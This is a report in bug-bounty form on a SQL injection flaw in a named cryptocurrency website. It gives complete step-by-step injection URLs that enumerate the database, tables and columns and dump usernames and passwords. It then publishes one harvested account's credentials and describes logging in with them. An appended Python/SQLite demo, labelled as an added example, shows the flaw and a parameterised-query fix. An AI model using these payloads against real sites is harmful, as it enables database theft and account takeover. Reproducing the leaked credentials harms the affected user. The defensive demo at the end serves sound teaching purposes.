- * bounty reward website https://amorcoin.io *
- the bug is on the page event-details.php?event=8; there is a gap that allows executing SQL commands against the database.
- the steps follow.
- *vuln test with a sign (*)
- this is the inject point.
- this link :
- https://amorcoin.io/event-details.php?event=8%27
- if it is vulnerable, there will be an error on the page
- this is the proof :
- https://prnt.sc/kwh41d
- *continue by calling the sql command with an order by.
- this link :
- https://amorcoin.io/event-details.php?event=8' order by+7-- -+
- the order by is already known up to 7.
- this is the proof :
- https://prnt.sc/kwh7mq
- *go further with the (union by select) command; this command calls the database and reads the contents of the database.
- link :
- https://amorcoin.io/event-details.php?event=-8%27%20union%20all%20select+1,2,3,4,5,6,7--%20-+
- this is the proof :
- https://prnt.sc/kwh66j
- above, the number (3) shows up nicely; this is the number that we will execute
- *we continue by dismantling the database and searching for a username and password
- dump link to get the database name:
- https://amorcoin.io/event-details.php?event=-8' union all select+1,2,database(),4,5,6,7-- -+
- found : amorcoin_acoin
- this is the proof :
- https://prnt.sc/kwh7di
- dump link to get the table names :
- https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),4,5,6,7-- -+
- found :
- this is the proof :
- https://prnt.sc/kwh8r3
- *and now we try to see the "mlm register" columns to find out the username and password
- dump link :
- https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f7265676973746572)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),4,5,6,7-- -+
- found :
- 11: username
- 12: user_fname
- 13: user_lname
- 14: user_password
- this is the proof :
- https://prnt.sc/kwhawi
- dump link :
- https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(amorcoin_acoin.mlm_register)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,user_password,0x3c62723e))))x),4,5,6,7-- -+
- found :
- this is the proof :
- https://prnt.sc/kwhan2
- *now we try to login
- link :
- https://amorcoin.io/login.php
- account :
- username : ee96ee
- password : 707290
- it works... I logged in successfully..
- link :
- https://amorcoin.io/profile.php?succ
- this is the proof :
- https://prnt.sc/kwhc3y
- * thanks a lot
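
Added example, not part of the original report and not the site's code: a Python/SQLite stand-in for the PHP/MySQL page that shows why the `event` parameter values in the report are parsed as SQL when concatenated into the query, and how an allow-list check plus a bound parameter stops them. The table layout, function names and sample rows are assumptions constructed for illustration.

```python
import sqlite3

# Constructed stand-in for the site's database: a 7-column events table
# (the report's ORDER BY probe found 7 columns) and a users table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, body TEXT,"
               " c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT)")
    db.execute("CREATE TABLE users (username TEXT, user_password TEXT)")
    db.execute("INSERT INTO events VALUES (8, 'Launch', 'Event text', '', '', '', '')")
    db.execute("INSERT INTO users VALUES ('demo_user', 'demo_secret')")
    return db

def event_vulnerable(db, event):
    # The request parameter is pasted into the SQL text, so a quote in it
    # ends the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM events WHERE id = '" + event + "'"
    return db.execute(sql).fetchone()

def event_hardened(db, event):
    # 1. Allow-list the input: an event id is a short run of ASCII digits.
    if not (event.isascii() and event.isdigit() and len(event) <= 9):
        raise ValueError("invalid event id")
    # 2. Bind it as a parameter so it can never be parsed as SQL.
    return db.execute("SELECT * FROM events WHERE id = ?", (int(event),)).fetchone()

def check(db, event):
    """Return (vulnerable_result, hardened_result) for one parameter value."""
    results = []
    for handler in (event_vulnerable, event_hardened):
        try:
            results.append(handler(db, event))
        except (sqlite3.Error, ValueError) as exc:
            results.append(type(exc).__name__)
    return tuple(results)

if __name__ == "__main__":
    db = make_db()
    # Parameter values from the report's requests (URL-decoded), plus one
    # constructed variant that reads the constructed users table.
    for value in ["8", "8'", "-8' union all select 1,2,3,4,5,6,7-- -",
                  "-8' union all select 1,2,user_password,4,5,6,7 from users-- -"]:
        print(repr(value), "->", check(db, value))
```

Storing passwords as salted, slow hashes instead of plaintext would also have limited what a dump of the user table exposes.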